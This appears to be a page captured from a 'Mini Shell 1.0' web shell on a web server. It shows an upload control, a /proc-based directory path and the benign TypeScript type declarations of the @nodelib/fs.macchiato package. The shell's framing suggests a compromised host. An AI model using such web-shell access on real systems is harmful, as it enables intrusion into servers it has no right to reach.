HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /proc/1991111/cwd/usr/share/node_modules/@nodelib/fs.macchiato/out/
Upload File :
Current File : //proc/1991111/cwd/usr/share/node_modules/@nodelib/fs.macchiato/out/types.d.ts
export declare type PrepareOptionsFromClass<T> = {
    [TKey in keyof T]?: UnboxReturnTypeFromClassItem<T[TKey]>;
};
export declare type UnboxReturnTypeFromClassItem<T> = 
/**
 * Unbox return type from class method.
 */
T extends (...args: unknown[]) => infer TReturnType ? TReturnType : 
/**
 * Unbox return type from class property.
 */
T extends (infer TReturnType) ? TReturnType : 
/**
 * Default branch. Potentially impossible case.
 */
T;